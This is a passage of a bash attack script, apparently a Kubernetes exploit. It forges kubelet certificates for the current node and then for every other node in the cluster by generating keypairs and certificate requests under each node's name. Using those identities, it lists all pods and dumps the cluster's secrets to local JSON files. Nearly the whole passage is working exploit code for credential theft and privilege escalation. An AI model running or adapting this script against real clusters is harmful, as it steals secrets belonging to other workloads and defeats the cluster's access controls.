-z "${SECRET}" ]]; then 154 | ./kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" -n "${NS}" get secret "${SECRET}" 2> /dev/null 1> /dev/null 155 | if [[ $? -eq 0 ]]; then 156 | echo "Exporting secrets/${NS}-${SECRET}.json" 157 | ./kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" -n "${NS}" get secret "${SECRET}" -o=json > "secrets/${NS}-${SECRET}.json" 158 | fi 159 | fi 160 | done 161 | } 162 | 163 | function get-pods-list { 164 | # Fetches a full pod listing to know which secrets are tied to which pods 165 | print-status "Download a full pod listing" 166 | ./kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" get pods --all-namespaces -o json > dumps/allpods.json 167 | } 168 | 169 | function get-nodes-list { 170 | # Fetch the listing of nodes in the cluster from K8s 171 | print-status "Get node names" 172 | ALL_NODE_NAMES="$(./kubectl --server=https://${KUBERNETES_MASTER_NAME} --certificate-authority=bootstrap/${CA_CERT_PEM} --client-certificate=nodes/${1}/${KUBELET_EC_CERT} --client-key=nodes/${1}/${KUBELET_EC_KEY} get nodes -o=jsonpath='{.items[*].metadata.name}')" 173 | } 174 | 175 | function impersonate-kubelet { 176 | # All the steps to get per-node credentials and dump the secrets it can access 177 | if [[ ! -d nodes/${1} ]]; then 178 | mkdir -p nodes/${1} 179 | fi 180 | if [[ ! -d dumps ]]; then 181 | mkdir -p dumps 182 | fi 183 | generate-openssl-cnf "${1}" 184 | generate-ec-keypair "${1}" 185 | generate-csr "${1}" 186 | generate-csr-yaml "${1}" 187 | generate-certificate "${1}" 188 | dump-secrets "${1}" 189 | } 190 | 191 | function iterate-through-nodes { 192 | # Find and iterate through all the other nodes in the cluster 193 | print-status "Iterate through all other node names" 194 | for i in ${ALL_NODE_NAMES}; do 195 | if [[ "${i}" != "${1}" ]]; then 196 | impersonate-kubelet "${i}" 197 | fi 198 | done 199 | } 200 | 201 | function print-ns-pod-secrets { 202 | # Extracts and prints namespace, podname, and secret 203 | print-status "Extracting namespace, podname, and secret listing" 204 | ./kubectl --server="https://${KUBERNETES_MASTER_NAME}" --certificate-authority="bootstrap/${CA_CERT_PEM}" --client-certificate="nodes/${1}/${KUBELET_EC_CERT}" --client-key="nodes/${1}/${KUBELET_EC_KEY}" get pods --all-namespaces -o=jsonpath='{range .items[*]}{.metadata.namespace}{"|"}{.metadata.name}{"|"}{.spec.volumes[*].secret.secretName}{"\n"}{end}' | sort -u > "dumps/${NS_POD_SECRETS}" 205 | } 206 | 207 | # Logic begins here 208 | check-binaries 209 | get-kube-env 210 | source-kube-env 211 | get-bootstrap-certs 212 | get-kubectl 213 | get-hostname 214 | impersonate-kubelet "${CURRENT_HOSTNAME}" 215 | get-pods-list "${CURRENT_HOSTNAME}" 216 | get-nodes-list "${CURRENT_HOSTNAME}" 217 | iterate-through-nodes "${CURRENT_HOSTNAME}" 218 | print-ns-pod-secrets "${CURRENT_HOSTNAME}" 219 | --------------------------------------------------------------------------------